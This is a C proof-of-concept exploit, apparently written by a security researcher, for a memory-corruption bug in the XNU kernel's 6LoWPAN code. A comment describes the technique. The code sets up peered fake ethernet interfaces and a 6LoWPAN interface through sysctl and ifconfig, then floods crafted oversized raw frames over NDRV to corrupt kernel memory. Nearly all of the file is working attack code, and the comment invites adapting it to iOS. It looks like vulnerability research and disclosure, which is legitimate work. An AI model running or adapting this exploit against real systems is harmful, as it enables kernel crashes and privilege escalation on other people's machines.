/* @i41nbeer

A better PoC for the XNU 6LoWPAN LPE

The original PoC I reported for this issue required physically connecting a gigabit ethernet adaptor,
not typically part of a remote exploit chain :)

As I mentioned, that was probably not actually a requirement and now I've spent a little more time
figuring out how to trigger the kernel memory corruption just with a root shell.

We can use the XNU if_fake network interface to create two "fake" ethernet adaptors and connect them
to each other. (IF_FAKE_S_CMD_SET_PEER is the string to search for in the XNU source if you want to figure
out how that works.)

We can then attach the 6LoWPAN interface to one of those and inject a raw frame on the other if_fake
interface.

For the raw frame injection I'm using NDRV.

By setting the net.link.fake.max_mtu sysctl to a large value we can create if_fake interfaces with
large MTUs, send large 6LoWPAN frames and trigger the mbuf corruption.

I'm pretty sure all the bits needed for this are present on iOS (it looks like if_fake is there)
but that is left as an exercise for you dear reader!
*/

#include <sys/socket.h>
#include <net/if.h>
#include <net/ndrv.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <net/ethernet.h>
#include <stdarg.h>

// code will fill these in properly
unsigned char dest_mac[ETHER_ADDR_LEN]  = {0x66, 0x65, 0x74, 0x68, 0x00, 0x01};
unsigned char src_mac[ETHER_ADDR_LEN]  = {0x66, 0x65, 0x74, 0x68, 0x00, 0x00};

char injection_interface_name[32] = {0};

#define MAX_CMD 4096
char cmd_out[MAX_CMD+1] = {0};

char* run_cmd(char* str) {
    FILE* f = popen(str, "r");

    if (f == NULL) {
        printf("command %s failed\n", str);
        return NULL;
    }

    memset(cmd_out, 0, sizeof(cmd_out));
    
    char* cur = cmd_out;;
    size_t remaining = MAX_CMD;

    while(1) {
        size_t amount_read = fread(cur, 1, remaining, f);
        remaining -= amount_read;
        cur += amount_read;

        if (amount_read == 0) {
            if (feof(f) || ferror(f)) {
                break;
            }
        }
    }

    *cur = '\x00';

    return cmd_out;
}

char* cmd(char* fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    char* cmd_str = NULL;
    int err = vasprintf(&cmd_str, fmt, ap);
    va_end(ap);

    if (err == -1) {
        printf("failed to format command\n");
        exit(1);
    }

    char* res = run_cmd(cmd_str);

    free(cmd_str);

    return res;
}

void rmnl(char* str) {
    while(*str) {
        if (*str == '\n') {
            *str = '\x00';
            return;
        }
        str++;
    }
    return;
}

// yes, I am too lazy to figure out all the ioctls to do all this properly :-)
void setup() {
    char* res = NULL;

    res = cmd("sysctl -n net.link.fake.max_mtu");
    uint32_t initial_mtu = atoi(res);
    printf("fake_if initial max mtu: %d\n", initial_mtu);

    res = cmd("sysctl net.link.fake.max_mtu=9000");
    printf("%s", res);

    // check that worked
    res = cmd("sysctl -n net.link.fake.max_mtu");
    uint32_t current_mtu = atoi(res);
    
    if (current_mtu != 9000) {
        printf("failed to set fake_if max MTU to a large value\n");
        exit(1);
    }

    printf("fake_if new max MTU: %d\n", current_mtu);

    // we want two if_fake ethernet interfaces
    res = cmd("ifconfig feth create");
    char feth0[32] = {0};
    strlcpy(feth0, res, 32);
    rmnl(feth0);
    printf("first fake interface: %s\n", feth0);
    strcpy(injection_interface_name, feth0);
    
    res = cmd("ifconfig feth create");
    char feth1[32] = {0};
    strlcpy(feth1, res, 32);
    rmnl(feth1);    
    printf("second fake interface: %s\n", feth1);

    printf("increasing MTU...\n");
    cmd("ifconfig %s mtu 9000", feth0);
    cmd("ifconfig %s mtu 9000", feth1);

    printf("connecting fake interfaces...\n");
    cmd("ifconfig %s peer %s", feth0, feth1);

    printf("getting MACs...\n");
    res = cmd("ifconfig %s ether | awk '/ether/ {print $2}'", feth0);
    struct ether_addr* addr = ether_aton(res);
    memcpy(src_mac, addr, ETHER_ADDR_LEN);
    printf("src mac: %s", res);


    res = cmd("ifconfig %s ether | awk '/ether/ {print $2}'", feth1);
    addr = ether_aton(res);
    memcpy(dest_mac, addr, ETHER_ADDR_LEN);
    printf("dst mac: %s", res);

    printf("creating 6LoWPAN interface...\n");
    res = cmd("ifconfig 6lowpan create");
    char sixlowpan0[32] = {0};
    strlcpy(sixlowpan0, res, 32);
    rmnl(sixlowpan0);    

    cmd("ifconfig %s up", sixlowpan0);
    printf("created 6LoWPAN interface: %s\n", sixlowpan0);
    
    
    printf("attaching 6LoWPAN interface to if_fake interface\n");
    cmd("ifconfig %s 6lowpansetdev %s", sixlowpan0, feth1);

    printf("increasing the 6LoWPAN MTU\n");
    cmd("ifconfig %s mtu 9000", sixlowpan0);

    printf("setup complete!\n");
}

uint8_t* build_frame(uint32_t frame_size) {
    uint8_t* buffer = malloc(frame_size);
    memset(buffer, 0, frame_size);

    struct ether_header* header = (struct ether_header*)buffer;

    memcpy(&header->ether_dhost, dest_mac, ETHER_HDR_LEN);
    memcpy(&header->ether_shost, src_mac, ETHER_HDR_LEN);

    header->ether_type = htons(0x0809);

    uint8_t* payload = (uint8_t*)(header+1);

    *(uint16_t*)payload = htons(frame_size - sizeof(struct ether_header) - 20);
    payload[2] = 0;
    payload[3] = 0;
    payload[4] = 0;
    payload[5] = 0;
    payload[6] = 2;

    return buffer;
}

int main (int argc, char **argv) {
   setup();


   // this NDRV interface code based on the example here: http://newosxbook.com/bonus/vol1ch16.html
   int rc;
   if (geteuid()) { fprintf(stderr,"No root, no service\n"); exit(1); }
   int s = socket(PF_NDRV,SOCK_RAW,0);
   if (s < 0) { perror ("socket"); exit(2); }

   struct sockaddr_ndrv    sa_ndrv;

   strlcpy((char *)sa_ndrv.snd_name, injection_interface_name, sizeof (sa_ndrv.snd_name));
   printf("injection interface name: %s\n", injection_interface_name);
   sa_ndrv.snd_family = PF_NDRV;
   sa_ndrv.snd_len = sizeof (sa_ndrv);
   
   rc = bind(s, (struct sockaddr *) &sa_ndrv, sizeof(sa_ndrv));
   
   if (rc < 0) { perror ("bind"); exit (3);}

   uint32_t frame_size = 5000;
   uint8_t* frame = build_frame(frame_size);
    
   for (int i = 0; i < 10000; i++) {
       rc = sendto (s, frame, frame_size, 0, 
            (struct sockaddr *)&sa_ndrv, sizeof(sa_ndrv));
       if (rc < 0) { perror("sendto"); }
       printf("sent\n");
       usleep(5*1000);
   }

   free(frame);

   return 0;
}
